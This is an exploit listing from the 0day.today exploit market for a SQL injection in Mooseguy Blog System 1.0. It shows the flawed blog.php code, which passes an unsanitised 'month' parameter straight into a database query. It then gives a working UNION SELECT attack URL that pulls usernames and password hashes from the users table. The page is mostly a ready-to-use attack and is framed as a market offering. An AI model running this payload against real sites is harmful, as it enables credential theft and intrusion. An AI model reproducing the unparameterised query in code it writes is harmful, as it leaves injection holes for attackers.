[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mooseguy Blog System 1.0 (blog.php month) SQL Injection Vulnerability

Author
The_HuliGun
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2524
Category
web applications
Date add
21-01-2008
Platform
unsorted
=====================================================================
Mooseguy Blog System 1.0 (blog.php month) SQL Injection Vulnerability
=====================================================================



# MGBS 1.0 Remote SQL injection

# Vulnerable code in blog.php 
 
 <?php
   $month = $_GET['month'];
   $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
   ...

# Admin hash exploit

http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*

# Bug discovered by The_HuliGun




#  0day.today [2024-11-15]  #